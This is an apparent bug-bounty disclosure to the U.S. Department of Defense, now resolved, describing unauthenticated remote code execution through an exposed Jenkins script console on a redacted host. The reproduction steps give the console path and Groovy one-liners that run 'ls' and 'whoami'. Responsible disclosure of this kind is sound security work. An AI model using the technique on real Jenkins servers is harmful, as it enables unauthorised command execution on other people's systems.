Unauth RCE on Jenkins Instance at https://█████████/
Critical
U
U.S. Dept Of Defense
Submitted None
Actions:
Reported by
brbsainath
Vulnerability Details
Technical details and impact analysis
**Description:**
Hi Team,
While Doing Recon on U.s Government Sites, I Found below asset Belongs to U.S Government (Please Check its SSL certificate to confirm or Please check attached POC Video)
█████████
https://███/
Attacker can execute Command Injection without Authentication.
## Impact
Unauth RCE
## System Host(s)
███
## Affected Product(s) and Version(s)
## CVE Numbers
## Steps to Reproduce
1. Navigate to https://███████/_script
2. Please execute below commands to confirm Unauth RCE.
Commands: println "ls".execute().text
println "whoami".execute().text
#POC
Please check Attached POC Video to follow steps (If Required)
██████
## Suggested Mitigation/Remediation Actions
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
OS Command Injection